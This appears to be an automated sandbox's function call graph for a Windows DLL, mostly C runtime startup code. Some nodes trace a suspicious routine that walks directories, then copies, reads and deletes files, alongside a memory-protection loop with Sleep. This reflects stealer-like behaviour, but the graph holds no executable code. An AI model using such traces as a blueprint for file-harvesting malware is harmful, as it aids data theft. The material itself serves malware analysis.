7264->7265 7266 22b28ad8 7264->7266 7267 22b28aeb 7265->7267 7274 22b28af4 __dosmaperr 7265->7274 7268 22b256d0 21 API calls 7266->7268 7269 22b2571e _free 20 API calls 7267->7269 7272 22b28ae0 7268->7272 7269->7272 7270 22b28af9 7273 22b26368 __dosmaperr 20 API calls 7270->7273 7271 22b28b1e RtlReAllocateHeap 7271->7272 7271->7274 7272->7256 7273->7272 7274->7270 7274->7271 7275 22b2474f __dosmaperr 7 API calls 7274->7275 7275->7274 7369 22b25bff 7377 22b25d5c 7369->7377 7372 22b25b7a __dosmaperr 20 API calls 7374 22b25c1b 7372->7374 7373 22b25c28 7374->7373 7375 22b25c2b 11 API calls 7374->7375 7376 22b25c13 7375->7376 7378 22b25c45 __dosmaperr 5 API calls 7377->7378 7379 22b25d83 7378->7379 7380 22b25d9b TlsAlloc 7379->7380 7383 22b25d8c 7379->7383 7380->7383 7381 22b22ada _ValidateLocalCookies 5 API calls 7382 22b25c09 7381->7382 7382->7372 7382->7376 7383->7381 7469 22b21f3f 7470 22b21f4b ___scrt_is_nonwritable_in_current_image 7469->7470 7487 22b2247c 7470->7487 7472 22b21f57 ___scrt_is_nonwritable_in_current_image 7473 22b21f52 7473->7472 7474 22b22041 7473->7474 7475 22b21f7c 7473->7475 7477 22b22639 ___scrt_fastfail 4 API calls 7474->7477 7498 22b223de 7475->7498 7478 22b22048 7477->7478 7479 22b21f8b __RTC_Initialize 7479->7472 7501 22b222fc RtlInitializeSListHead 7479->7501 7481 22b21f99 ___scrt_initialize_default_local_stdio_options 7502 22b246c5 7481->7502 7485 22b21fb8 7485->7472 7486 22b24669 _abort 5 API calls 7485->7486 7486->7472 7488 22b22485 7487->7488 7510 22b22933 IsProcessorFeaturePresent 7488->7510 7492 22b22496 7497 22b2249a 7492->7497 7521 22b253c8 7492->7521 7495 22b224b1 7495->7473 7496 22b23529 ___vcrt_uninitialize 8 API calls 7496->7497 7497->7473 7552 22b224b5 7498->7552 7500 22b223e5 7500->7479 7501->7481 7504 22b246dc 7502->7504 7503 22b22ada _ValidateLocalCookies 5 API calls 7505 22b21fad 7503->7505 7504->7503 7505->7472 7506 22b223b3 7505->7506 7507 22b223b8 ___scrt_release_startup_lock 7506->7507 7508 22b22933 ___isa_available_init IsProcessorFeaturePresent 7507->7508 7509 22b223c1 7507->7509 7508->7509 7509->7485 7511 22b22491 7510->7511 7512 22b234ea 7511->7512 7513 22b234ef ___vcrt_initialize_winapi_thunks 7512->7513 7524 22b23936 7513->7524 7517 22b23505 7518 22b23510 7517->7518 7519 22b23972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7517->7519 7518->7492 7520 22b234fd 7519->7520 7520->7492 7548 22b27457 7521->7548 7525 22b2393f 7524->7525 7527 22b23968 7525->7527 7529 22b234f9 7525->7529 7538 22b23be0 7525->7538 7528 22b23972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7527->7528 7528->7529 7529->7520 7530 22b238e8 7529->7530 7543 22b23af1 7530->7543 7533 22b238fd 7533->7517 7534 22b23ba2 ___vcrt_FlsSetValue 6 API calls 7535 22b2390b 7534->7535 7536 22b23918 7535->7536 7537 22b2391b ___vcrt_uninitialize_ptd 6 API calls 7535->7537 7536->7517 7537->7533 7539 22b23a82 try_get_function 5 API calls 7538->7539 7540 22b23bfa 7539->7540 7541 22b23c18 InitializeCriticalSectionAndSpinCount 7540->7541 7542 22b23c03 7540->7542 7541->7542 7542->7525 7544 22b23a82 try_get_function 5 API calls 7543->7544 7545 22b23b0b 7544->7545 7546 22b23b24 TlsAlloc 7545->7546 7547 22b238f2 7545->7547 7547->7533 7547->7534 7551 22b27470 7548->7551 7549 22b22ada _ValidateLocalCookies 5 API calls 7550 22b224a3 7549->7550 7550->7495 7550->7496 7551->7549 7553 22b224c4 7552->7553 7554 22b224c8 7552->7554 7553->7500 7555 22b224d5 ___scrt_release_startup_lock 7554->7555 7556 22b22639 ___scrt_fastfail 4 API calls 7554->7556 7555->7500 7557 22b22559 7556->7557 6979 22b2543d 6980 22b25440 6979->6980 6981 22b255a8 _abort 38 API calls 6980->6981 6982 22b2544c 6981->6982 6039 4586e09 6040 4586e59 6039->6040 6040->6039 6041 4586e82 Sleep 6040->6041 6042 4586ecd NtProtectVirtualMemory 6040->6042 6041->6039 6042->6040 7081 22b27260 GetStartupInfoW 7082 22b27286 7081->7082 7083 22b27318 7081->7083 7082->7083 7087 22b28be3 7082->7087 7085 22b272af 7085->7083 7086 22b272dd GetFileType 7085->7086 7086->7085 7088 22b28bef ___scrt_is_nonwritable_in_current_image 7087->7088 7089 22b28c13 7088->7089 7090 22b28bfc 7088->7090 7100 22b25671 RtlEnterCriticalSection 7089->7100 7091 22b26368 __dosmaperr 20 API calls 7090->7091 7093 22b28c01 7091->7093 7095 22b262ac ___std_exception_copy 26 API calls 7093->7095 7094 22b28c1f 7099 22b28c4b 7094->7099 7101 22b28b34 7094->7101 7096 22b28c0b _abort 7095->7096 7096->7085 7108 22b28c72 7099->7108 7100->7094 7102 22b2637b __dosmaperr 20 API calls 7101->7102 7103 22b28b46 7102->7103 7105 22b25eb7 11 API calls 7103->7105 7107 22b28b53 7103->7107 7104 22b2571e _free 20 API calls 7106 22b28ba5 7104->7106 7105->7103 7106->7094 7107->7104 7111 22b256b9 RtlLeaveCriticalSection 7108->7111 7110 22b28c79 7110->7096 7111->7110 7276 22b281a0 7277 22b281d9 7276->7277 7278 22b281dd 7277->7278 7289 22b28205 7277->7289 7279 22b26368 __dosmaperr 20 API calls 7278->7279 7280 22b281e2 7279->7280 7282 22b262ac ___std_exception_copy 26 API calls 7280->7282 7281 22b28529 7283 22b22ada _ValidateLocalCookies 5 API calls 7281->7283 7284 22b281ed 7282->7284 7285 22b28536 7283->7285 7286 22b22ada _ValidateLocalCookies 5 API calls 7284->7286 7287 22b281f9 7286->7287 7289->7281 7290 22b280c0 7289->7290 7291 22b280db 7290->7291 7292 22b22ada _ValidateLocalCookies 5 API calls 7291->7292 7293 22b28152 7292->7293 7293->7289 7384 22b2a1e0 7387 22b2a1fe 7384->7387 7386 22b2a1f6 7391 22b2a203 7387->7391 7388 22b2aa53 21 API calls 7390 22b2a42f 7388->7390 7389 22b2a298 7389->7386 7390->7386 7391->7388 7391->7389 7294 22b221a1 ___scrt_dllmain_exception_filter 7590 22b29d61 7591 22b29d81 7590->7591 7594 22b29db8 7591->7594 7593 22b29dab 7596 22b29dbf 7594->7596 7595 22b29e20 7597 22b2a90e 7595->7597 7603 22b2aa17 7595->7603 7596->7595 7600 22b29ddf 7596->7600 7597->7593 7600->7597 7601 22b2aa17 21 API calls 7600->7601 7602 22b2a93e 7601->7602 7602->7593 7604 22b2aa20 7603->7604 7607 22b2b19b 7604->7607 7608 22b2b1da __startOneArgErrorHandling 7607->7608 7613 22b2b25c __startOneArgErrorHandling 7608->7613 7617 22b2b59e 7608->7617 7610 22b2b286 7611 22b2b8b2 __startOneArgErrorHandling 20 API calls 7610->7611 7612 22b2b292 7610->7612 7611->7612 7615 22b22ada _ValidateLocalCookies 5 API calls 7612->7615 7613->7610 7614 22b278a3 __startOneArgErrorHandling 5 API calls 7613->7614 7614->7610 7616 22b29e6e 7615->7616 7616->7593 7618 22b2b5c1 __raise_exc RaiseException 7617->7618 7619 22b2b5bc 7618->7619 7619->7613 7295 22b2c7a7 7296 22b2c7be 7295->7296 7300 22b2c80d 7295->7300 7296->7300 7304 22b2c7e6 GetModuleHandleA 7296->7304 7297 22b2c872 7298 22b2c835 GetModuleHandleA 7298->7300 7300->7297 7300->7298 7302 22b2c85f GetProcAddress 7300->7302 7302->7300 7305 22b2c7ef 7304->7305 7311 22b2c80d 7304->7311 7313 22b2c803 GetProcAddress 7305->7313 7308 22b2c872 7309 22b2c835 GetModuleHandleA 7309->7311 7311->7308 7311->7309 7312 22b2c85f GetProcAddress 7311->7312 7312->7311 7317 22b2c80d 7313->7317 7314 22b2c872 7315 22b2c835 GetModuleHandleA 7315->7317 7316 22b2c85f GetProcAddress 7316->7317 7317->7314 7317->7315 7317->7316 6983 22b2742b 6984 22b27430 6983->6984 6986 22b27453 6984->6986 6987 22b28bae 6984->6987 6988 22b28bbb 6987->6988 6992 22b28bdd 6987->6992 6989 22b28bd7 6988->6989 6990 22b28bc9 RtlDeleteCriticalSection 6988->6990 6991 22b2571e _free 20 API calls 6989->6991 6990->6989 6990->6990 6991->6992 6992->6984 7112 22b2ac6b 7113 22b2ac84 __startOneArgErrorHandling 7112->7113 7114 22b2b2f0 21 API calls 7113->7114 7115 22b2acad __startOneArgErrorHandling 7113->7115 7114->7115 7116 22b2506f 7117 22b25081 7116->7117 7118 22b25087 7116->7118 7119 22b25000 20 API calls 7117->7119 7119->7118 6665 22b260ac 6667 22b260b7 6665->6667 6668 22b260dd 6665->6668 6666 22b260c7 FreeLibrary 6666->6667 6667->6666 6667->6668 6669 22b23c90 RtlUnwind 6916 22b236d0 6917 22b236e2 6916->6917 6919 22b236f0 @_EH4_CallFilterFunc@8 6916->6919 6918 22b22ada _ValidateLocalCookies 5 API calls 6917->6918 6918->6919 7620 22b25351 7621 22b25360 7620->7621 7622 22b25374 7620->7622 7621->7622 7625 22b2571e _free 20 API calls 7621->7625 7623 22b2571e _free 20 API calls 7622->7623 7624 22b25386 7623->7624 7626 22b2571e _free 20 API calls 7624->7626 7625->7622 7627 22b25399 7626->7627 7628 22b2571e _free 20 API calls 7627->7628 7629 22b253aa 7628->7629 7630 22b2571e _free 20 API calls 7629->7630 7631 22b253bb 7630->7631 6920 22b24ed7 6921 22b26d60 51 API calls 6920->6921 6922 22b24ee9 6921->6922 6931 22b27153 GetEnvironmentStringsW 6922->6931 6925 22b24ef4 6927 22b2571e _free 20 API calls 6925->6927 6928 22b24f29 6927->6928 6929 22b24eff 6930 22b2571e _free 20 API calls 6929->6930 6930->6925 6932 22b2716a 6931->6932 6942 22b271bd 6931->6942 6935 22b27170 WideCharToMultiByte 6932->6935 6933 22b271c6 FreeEnvironmentStringsW 6934 22b24eee 6933->6934 6934->6925 6943 22b24f2f 6934->6943 6936 22b2718c 6935->6936 6935->6942 6937 22b256d0 21 API calls 6936->6937 6938 22b27192 6937->6938 6939 22b271af 6938->6939 6940 22b27199 WideCharToMultiByte 6938->6940 6941 22b2571e _free 20 API calls 6939->6941 6940->6939 6941->6942 6942->6933 6942->6934 6944 22b24f44 6943->6944 6945 22b2637b __dosmaperr 20 API calls 6944->6945 6946 22b24f6b 6945->6946 6947 22b24fcf 6946->6947 6950 22b2637b __dosmaperr 20 API calls 6946->6950 6951 22b24fd1 6946->6951 6956 22b24ff3 6946->6956 6958 22b2571e _free 20 API calls 6946->6958 6960 22b2544d 6946->6960 6948 22b2571e _free 20 API calls 6947->6948 6949 22b24fe9 6948->6949 6949->6929 6950->6946 6952 22b25000 20 API calls 6951->6952 6954 22b24fd7 6952->6954 6955 22b2571e _free 20 API calls 6954->6955 6955->6947 6957 22b262bc ___std_exception_copy 11 API calls 6956->6957 6959 22b24fff 6957->6959 6958->6946 6961 22b2545a 6960->6961 6962 22b25468 6960->6962 6961->6962 6967 22b2547f 6961->6967 6963 22b26368 __dosmaperr 20 API calls 6962->6963 6964 22b25470 6963->6964 6965 22b262ac ___std_exception_copy 26 API calls 6964->6965 6966 22b2547a 6965->6966 6966->6946 6967->6966 6968 22b26368 __dosmaperr 20 API calls 6967->6968 6968->6964 7392 22b273d5 7393 22b273e1 ___scrt_is_nonwritable_in_current_image 7392->7393 7404 22b25671 RtlEnterCriticalSection 7393->7404 7395 22b273e8 7396 22b28be3 27 API calls 7395->7396 7397 22b273f7 7396->7397 7403 22b27406 7397->7403 7405 22b27269 GetStartupInfoW 7397->7405 7401 22b27417 _abort 7416 22b27422 7403->7416 7404->7395 7406 22b27286 7405->7406 7407 22b27318 7405->7407 7406->7407 7408 22b28be3 27 API calls 7406->7408 7411 22b2731f 7407->7411 7409 22b272af 7408->7409 7409->7407 7410 22b272dd GetFileType 7409->7410 7410->7409 7412 22b27326 7411->7412 7413 22b27369 GetStdHandle 7412->7413 7414 22b273d1 7412->7414 7415 22b2737c GetFileType 7412->7415 7413->7412 7414->7403 7415->7412 7419 22b256b9 RtlLeaveCriticalSection 7416->7419 7418 22b27429 7418->7401 7419->7418 6670 22b24a9a 6671 22b25411 38 API calls 6670->6671 6672 22b24aa2 6671->6672 6043 22b220db 6045 22b220e7 ___scrt_is_nonwritable_in_current_image 6043->6045 6044 22b22110 dllmain_raw 6046 22b2212a 6044->6046 6054 22b220f6 6044->6054 6045->6044 6050 22b2210b 6045->6050 6045->6054 6056 22b21eec 6046->6056 6048 22b22177 6049 22b21eec 31 API calls 6048->6049 6048->6054 6051 22b2218a 6049->6051 6050->6048 6053 22b21eec 31 API calls 6050->6053 6050->6054 6052 22b22193 dllmain_raw 6051->6052 6051->6054 6052->6054 6055 22b2216d dllmain_raw 6053->6055 6055->6048 6057 22b21ef7 6056->6057 6058 22b21f2a dllmain_crt_process_detach 6056->6058 6059 22b21f1c dllmain_crt_process_attach 6057->6059 6060 22b21efc 6057->6060 6065 22b21f06 6058->6065 6059->6065 6061 22b21f12 6060->6061 6062 22b21f01 6060->6062 6071 22b223ec 6061->6071 6062->6065 6066 22b2240b 6062->6066 6065->6050 6079 22b253e5 6066->6079 6304 22b23513 6071->6304 6076 22b22408 6076->6065 6077 22b2351e 7 API calls 6078 22b223f5 6077->6078 6078->6065 6085 22b25aca 6079->6085 6082 22b2351e 6275 22b23820 6082->6275 6084 22b22415 6084->6065 6086 22b25ad4 6085->6086 6089 22b22410 6085->6089 6093 22b25e08 6086->6093 6089->6082 6113 22b25c45 6093->6113 6095 22b25e2f 6096 22b25e47 TlsGetValue 6095->6096 6097 22b25e3b 6095->6097 6096->6097 6119 22b22ada 6097->6119 6099 22b25adb 6099->6089 6100 22b25e5e 6099->6100 6101 22b25c45 __dosmaperr 5 API calls 6100->6101 6102 22b25e85 6101->6102 6103 22b25ea0 TlsSetValue 6102->6103 6104 22b25e94 6102->6104 6103->6104 6105 22b22ada _ValidateLocalCookies 5 API calls 6104->6105 6106 22b25aee 6105->6106 6107 22b259b5 6106->6107 6108 22b259d0 6107->6108 6109 22b259c0 6107->6109 6108->6089 6134 22b259d6 6109->6134 6116 22b25c71 6113->6116 6118 22b25c75 __crt_fast_encode_pointer 6113->6118 6114 22b25c95 6117 22b25ca1 GetProcAddress 6114->6117 6114->6118 6116->6114 6116->6118 6126 22b25ce1 6116->6126 6117->6118 6118->6095 6120 22b22ae3 6119->6120 6121 22b22ae5 IsProcessorFeaturePresent 6119->6121 6120->6099 6123 22b22b58 6121->6123 6133 22b22b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6123->6133 6125 22b22c3b 6125->6099 6127 22b25d02 LoadLibraryExW 6126->6127 6128 22b25cf7 6126->6128 6129 22b25d1f GetLastError 6127->6129 6132 22b25d37 6127->6132 6128->6116 6130 22b25d2a LoadLibraryExW 6129->6130 6129->6132 6130->6132 6131 22b25d4e FreeLibrary 6131->6128 6132->6128 6132->6131 6133->6125 6135 22b259ef 6134->6135 6136 22b259e9 6134->6136 6138 22b2571e _free 20 API calls 6135->6138 6137 22b2571e _free 20 API calls 6136->6137 6137->6135 6139 22b259fb 6138->6139 6140 22b2571e _free 20 API calls 6139->6140 6141 22b25a06 6140->6141 6142 22b2571e _free 20 API calls 6141->6142 6143 22b25a11 6142->6143 6144 22b2571e _free 20 API calls 6143->6144 6145 22b25a1c 6144->6145 6146 22b2571e _free 20 API calls 6145->6146 6147 22b25a27 6146->6147 6148 22b2571e _free 20 API calls 6147->6148 6149 22b25a32 6148->6149 6150 22b2571e _free 20 API calls 6149->6150 6151 22b25a3d 6150->6151 6152 22b2571e _free 20 API calls 6151->6152 6153 22b25a48 6152->6153 6154 22b2571e _free 20 API calls 6153->6154 6155 22b25a56 6154->6155 6166 22b2589c 6155->6166 6160 22b2571e 6161 22b25752 __dosmaperr 6160->6161 6162 22b25729 RtlFreeHeap 6160->6162 6161->6108 6162->6161 6163 22b2573e 6162->6163 6230 22b26368 6163->6230 6172 22b257a8 6166->6172 6168 22b258c0 6169 22b258ec 6168->6169 6185 22b25809 6169->6185 6171 22b25910 6171->6160 6173 22b257b4 ___scrt_is_nonwritable_in_current_image 6172->6173 6180 22b25671 RtlEnterCriticalSection 6173->6180 6175 22b257e8 6181 22b257fd 6175->6181 6177 22b257f5 _abort 6177->6168 6178 22b257be 6178->6175 6179 22b2571e _free 20 API calls 6178->6179 6179->6175 6180->6178 6184 22b256b9 RtlLeaveCriticalSection 6181->6184 6183 22b25807 6183->6177 6184->6183 6186 22b25815 ___scrt_is_nonwritable_in_current_image 6185->6186 6193 22b25671 RtlEnterCriticalSection 6186->6193 6188 22b2581f 6194 22b25a7f 6188->6194 6190 22b25832 6198 22b25848 6190->6198 6192 22b25840 _abort 6192->6171 6193->6188 6195 22b25ab5 __fassign 6194->6195 6196 22b25a8e __fassign 6194->6196 6195->6190 6196->6195 6201 22b27cc2 6196->6201 6229 22b256b9 RtlLeaveCriticalSection 6198->6229 6200 22b25852 6200->6192 6202 22b27d42 6201->6202 6205 22b27cd8 6201->6205 6204 22b2571e _free 20 API calls 6202->6204 6227 22b27d90 6202->6227 6203 22b27e35 __fassign 20 API calls 6208 22b27d9e 6203->6208 6206 22b27d64 6204->6206 6205->6202 6209 22b2571e _free 20 API calls 6205->6209 6211 22b27d0b 6205->6211 6207 22b2571e _free 20 API calls 6206->6207 6210 22b27d77 6207->6210 6213 22b27dfe 6208->6213 6226 22b2571e 20 API calls _free 6208->6226 6214 22b27d00 6209->6214 6215 22b2571e _free 20 API calls 6210->6215 6216 22b2571e _free 20 API calls 6211->6216 6228 22b27d2d 6211->6228 6212 22b2571e _free 20 API calls 6217 22b27d37 6212->6217 6218 22b2571e _free 20 API calls 6213->6218 6219 22b290ba ___free_lconv_mon 20 API calls 6214->6219 6220 22b27d85 6215->6220 6221 22b27d22 6216->6221 6222 22b2571e _free 20 API calls 6217->6222 6223 22b27e04 6218->6223 6219->6211 6224 22b2571e _free 20 API calls 6220->6224 6225 22b291b8 __fassign 20 API calls 6221->6225 6222->6202 6223->6195 6224->6227 6225->6228 6226->6208 6227->6203 6228->6212 6229->6200 6233 22b25b7a GetLastError 6230->6233 6234 22b25b93 6233->6234 6235 22b25b99 6233->6235 6236 22b25e08 __dosmaperr 11 API calls 6234->6236 6239 22b25bf0 SetLastError 6235->6239 6252 22b2637b 6235->6252 6236->6235 6241 22b25744 GetLastError 6239->6241 6240 22b25e5e __dosmaperr 11 API calls 6243 22b25bc8 6240->6243 6241->6161 6242 22b25bb3 6244 22b2571e _free 17 API calls 6242->6244 6243->6242 6246 22b25bcf 6243->6246 6245 22b25bb9 6244->6245 6247 22b25be7 SetLastError 6245->6247 6259 22b2593c 6246->6259 6247->6241 6250 22b2571e _free 17 API calls 6251 22b25be0 6250->6251 6251->6239 6251->6247 6257 22b26388 __dosmaperr 6252->6257 6253 22b263b3 RtlAllocateHeap 6255 22b25bab 6253->6255 6253->6257 6254 22b263c8 6256 22b26368 __dosmaperr 19 API calls 6254->6256 6255->6240 6255->6242 6256->6255 6257->6253 6257->6254 6264 22b2474f 6257->6264 6269 22b25914 6259->6269 6265 22b24793 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6264->6265 6266 22b24765 6265->6266 6267 22b22ada _ValidateLocalCookies 5 API calls 6266->6267 6268 22b2478f 6267->6268 6268->6257 6270 22b25854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6269->6270 6271 22b25938 6270->6271 6272 22b258c4 6271->6272 6273 22b25758 __dosmaperr 20 API calls 6272->6273 6274 22b258e8 6273->6274 6274->6250 6276 22b2382d 6275->6276 6280 22b2384b ___vcrt_freefls@4 6275->6280 6277 22b2383b 6276->6277 6281 22b23b67 6276->6281 6286 22b23ba2 6277->6286 6280->6084 6291 22b23a82 6281->6291 6283 22b23b81 6284 22b23b99 TlsGetValue 6283->6284 6285 22b23b8d 6283->6285 6284->6285 6285->6277 6287 22b23a82 try_get_function 5 API calls 6286->6287 6288 22b23bbc 6287->6288 6289 22b23bd7 TlsSetValue 6288->6289 6290 22b23bcb 6288->6290 6289->6290 6290->6280 6292 22b23aaa 6291->6292 6296 22b23aa6 __crt_fast_encode_pointer 6291->6296 6292->6296 6297 22b239be 6292->6297 6295 22b23ac4 GetProcAddress 6295->6296 6296->6283 6302 22b239cd try_get_first_available_module 6297->6302 6298 22b239ea LoadLibraryExW 6299 22b23a05 GetLastError 6298->6299 6298->6302 6299->6302 6300 22b23a60 FreeLibrary 6300->6302 6301 22b23a77 6301->6295 6301->6296 6302->6298 6302->6300 6302->6301 6303 22b23a38 LoadLibraryExW 6302->6303 6303->6302 6310 22b23856 6304->6310 6306 22b223f1 6306->6078 6307 22b253da 6306->6307 6308 22b25b7a __dosmaperr 20 API calls 6307->6308 6309 22b223fd 6308->6309 6309->6076 6309->6077 6311 22b23862 GetLastError 6310->6311 6312 22b2385f 6310->6312 6313 22b23b67 ___vcrt_FlsGetValue 6 API calls 6311->6313 6312->6306 6314 22b23877 6313->6314 6315 22b238dc SetLastError 6314->6315 6316 22b23ba2 ___vcrt_FlsSetValue 6 API calls 6314->6316 6321 22b23896 6314->6321 6315->6306 6317 22b23890 6316->6317 6318 22b238b8 6317->6318 6319 22b23ba2 ___vcrt_FlsSetValue 6 API calls 6317->6319 6317->6321 6320 22b23ba2 ___vcrt_FlsSetValue 6 API calls 6318->6320 6318->6321 6319->6318 6320->6321 6321->6315 6322 22b21c5b 6323 22b21c6b ___scrt_fastfail 6322->6323 6326 22b212ee 6323->6326 6325 22b21c87 6327 22b21324 ___scrt_fastfail 6326->6327 6328 22b213b7 GetEnvironmentVariableW 6327->6328 6352 22b210f1 6328->6352 6331 22b210f1 57 API calls 6332 22b21465 6331->6332 6333 22b210f1 57 API calls 6332->6333 6334 22b21479 6333->6334 6335 22b210f1 57 API calls 6334->6335 6336 22b2148d 6335->6336 6337 22b210f1 57 API calls 6336->6337 6338 22b214a1 6337->6338 6339 22b210f1 57 API calls 6338->6339 6340 22b214b5 lstrlenW 6339->6340 6341 22b214d2 6340->6341 6342 22b214d9 lstrlenW 6340->6342 6341->6325 6343 22b210f1 57 API calls 6342->6343 6344 22b21501 lstrlenW lstrcatW 6343->6344 6345 22b210f1 57 API calls 6344->6345 6346 22b21539 lstrlenW lstrcatW 6345->6346 6347 22b210f1 57 API calls 6346->6347 6348 22b2156b lstrlenW lstrcatW 6347->6348 6349 22b210f1 57 API calls 6348->6349 6350 22b2159d lstrlenW lstrcatW 6349->6350 6351 22b210f1 57 API calls 6350->6351 6351->6341 6353 22b21118 ___scrt_fastfail 6352->6353 6354 22b21129 lstrlenW 6353->6354 6365 22b22c40 6354->6365 6357 22b21177 lstrlenW FindFirstFileW 6359 22b211a0 6357->6359 6360 22b211e1 6357->6360 6358 22b21168 lstrlenW 6358->6357 6361 22b211c7 FindNextFileW 6359->6361 6362 22b211aa 6359->6362 6360->6331 6361->6359 6364 22b211da FindClose 6361->6364 6362->6361 6367 22b21000 6362->6367 6364->6360 6366 22b21148 lstrcatW lstrlenW 6365->6366 6366->6357 6366->6358 6368 22b21022 ___scrt_fastfail 6367->6368 6369 22b210af 6368->6369 6370 22b2102f lstrcatW lstrlenW 6368->6370 6371 22b210b5 lstrlenW 6369->6371 6372 22b210ad 6369->6372 6373 22b2105a lstrlenW 6370->6373 6374 22b2106b lstrlenW 6370->6374 6398 22b21e16 6371->6398 6372->6362 6373->6374 6384 22b21e89 lstrlenW 6374->6384 6377 22b210ca 6377->6372 6380 22b21e89 5 API calls 6377->6380 6378 22b21088 GetFileAttributesW 6378->6372 6379 22b2109c 6378->6379 6379->6372 6390 22b2173a 6379->6390 6382 22b210df 6380->6382 6403 22b211ea 6382->6403 6385 22b22c40 ___scrt_fastfail 6384->6385 6386 22b21ea7 lstrcatW lstrlenW 6385->6386 6387 22b21ec2 6386->6387 6388 22b21ed1 lstrcatW 6386->6388 6387->6388 6389 22b21ec7 lstrlenW 6387->6389 6388->6378 6389->6388 6391 22b21747 ___scrt_fastfail 6390->6391 6418 22b21cca 6391->6418 6395 22b2199f 6395->6372 6396 22b21824 ___scrt_fastfail _strlen 6396->6395 6438 22b215da 6396->6438 6399 22b21e29 6398->6399 6402 22b21e4c 6398->6402 6400 22b21e2d lstrlenW 6399->6400 6399->6402 6401 22b21e3f lstrlenW 6400->6401 6400->6402 6401->6402 6402->6377 6404 22b2120e ___scrt_fastfail 6403->6404 6405 22b21e89 5 API calls 6404->6405 6406 22b21220 GetFileAttributesW 6405->6406 6407 22b21246 6406->6407 6408 22b21235 6406->6408 6409 22b21e89 5 API calls 6407->6409 6408->6407 6410 22b2173a 35 API calls 6408->6410 6411 22b21258 6409->6411 6410->6407 6412 22b210f1 56 API calls 6411->6412 6413 22b2126d 6412->6413 6414 22b21e89 5 API calls 6413->6414 6415 22b2127f ___scrt_fastfail 6414->6415 6416 22b210f1 56 API calls 6415->6416 6417 22b212e6 6416->6417 6417->6372 6419 22b21cf1 ___scrt_fastfail 6418->6419 6420 22b21d0f CopyFileW CreateFileW 6419->6420 6421 22b21d44 DeleteFileW 6420->6421 6422 22b21d55 GetFileSize 6420->6422 6427 22b21808 6421->6427 6423 22b21ede 22 API calls 6422->6423 6424 22b21d66 ReadFile 6423->6424 6425 22b21d94 CloseHandle DeleteFileW 6424->6425 6426 22b21d7d CloseHandle DeleteFileW 6424->6426 6425->6427 6426->6427 6427->6395 6428 22b21ede 6427->6428 6430 22b2222f 6428->6430 6431 22b2224e 6430->6431 6432 22b2474f __dosmaperr 7 API calls 6430->6432 6434 22b22250 6430->6434 6446 22b247e5 6430->6446 6431->6396 6432->6430 6433 22b22908 6435 22b235d2 __CxxThrowException@8 RaiseException 6433->6435 6434->6433 6453 22b235d2 6434->6453 6436 22b22925 6435->6436 6436->6396 6439 22b2160c _strcat _strlen 6438->6439 6440 22b2163c lstrlenW 6439->6440 6456 22b21c9d 6440->6456 6442 22b21655 lstrcatW lstrlenW 6443 22b21678 6442->6443 6444 22b21693 ___scrt_fastfail 6443->6444 6445 22b2167e lstrcatW 6443->6445 6444->6396 6445->6444 6451 22b256d0 __dosmaperr 6446->6451 6447 22b2570e 6448 22b26368 __dosmaperr 20 API calls 6447->6448 6450 22b2570c 6448->6450 6449 22b256f9 RtlAllocateHeap 6449->6450 6449->6451 6450->6430 6451->6447 6451->6449 6452 22b2474f __dosmaperr 7 API calls 6451->6452 6452->6451 6455 22b235f2 RaiseException 6453->6455 6455->6433 6457 22b21ca6 _strlen 6456->6457 6457->6442 6993 22b22418 6994 22b22420 ___scrt_release_startup_lock 6993->6994 6997 22b247f5 6994->6997 6996 22b22448 6998 22b24804 6997->6998 6999 22b24808 6997->6999 6998->6996 7002 22b24815 6999->7002 7003 22b25b7a __dosmaperr 20 API calls 7002->7003 7006 22b2482c 7003->7006 7004 22b22ada _ValidateLocalCookies 5 API calls 7005 22b24811 7004->7005 7005->6996 7006->7004 7007 22b2281c 7010 22b22882 7007->7010 7013 22b23550 7010->7013 7012 22b2282a 7014 22b2358a 7013->7014 7015 22b2355d 7013->7015 7014->7012 7015->7014 7015->7015 7016 22b247e5 ___std_exception_copy 21 API calls 7015->7016 7017 22b2357a 7016->7017 7017->7014 7018 22b2544d ___std_exception_copy 26 API calls 7017->7018 7018->7014 7420 22b24bdd 7421 22b24c08 7420->7421 7422 22b24bec 7420->7422 7424 22b26d60 51 API calls 7421->7424 7422->7421 7423 22b24bf2 7422->7423 7425 22b26368 __dosmaperr 20 API calls 7423->7425 7426 22b24c0f GetModuleFileNameA 7424->7426 7427 22b24bf7 7425->7427 7428 22b24c33 7426->7428 7429 22b262ac ___std_exception_copy 26 API calls 7427->7429 7443 22b24d01 7428->7443 7440 22b24c01 7429->7440 7432 22b24e76 20 API calls 7433 22b24c5d 7432->7433 7434 22b24c72 7433->7434 7435 22b24c66 7433->7435 7437 22b24d01 38 API calls 7434->7437 7436 22b26368 __dosmaperr 20 API calls 7435->7436 7438 22b24c6b 7436->7438 7441 22b24c88 7437->7441 7439 22b2571e _free 20 API calls 7438->7439 7439->7440 7441->7438 7442 22b2571e _free 20 API calls 7441->7442 7442->7438 7445 22b24d26 7443->7445 7446 22b24d86 7445->7446 7449 22b270eb 7445->7449 7447 22b24c50 7446->7447 7448 22b270eb 38 API calls 7446->7448 7447->7432 7448->7446 7452 22b27092 7449->7452 7453 22b254a7 __fassign 38 API calls 7452->7453 7454 22b270a6 7453->7454 7454->7445 7558 22b25303 7561 22b250a5 7558->7561 7570 22b2502f 7561->7570 7564 22b2502f 5 API calls 7565 22b250c3 7564->7565 7566 22b25000 20 API calls 7565->7566 7567 22b250ce 7566->7567 7568 22b25000 20 API calls 7567->7568 7569 22b250d9 7568->7569 7571 22b25048 7570->7571 7572 22b22ada _ValidateLocalCookies 5 API calls 7571->7572 7573 22b25069 7572->7573 7573->7564 7574 22b27103 GetCommandLineA GetCommandLineW 7632 22b2af43 7633 22b2af59 7632->7633 7634 22b2af4d 7632->7634 7634->7633 7635 22b2af52 CloseHandle 7634->7635 7635->7633 6673 22b27a80 6674 22b27a8d 6673->6674 6675 22b2637b __dosmaperr 20 API calls 6674->6675 6676 22b27aa7 6675->6676 6677 22b2571e _free 20 API calls 6676->6677 6678 22b27ab3 6677->6678 6679 22b2637b __dosmaperr 20 API calls 6678->6679 6682 22b27ad9 6678->6682 6681 22b27acd 6679->6681 6683 22b2571e _free 20 API calls 6681->6683 6684 22b27ae5 6682->6684 6685 22b25eb7 6682->6685 6683->6682 6686 22b25c45 __dosmaperr 5 API calls 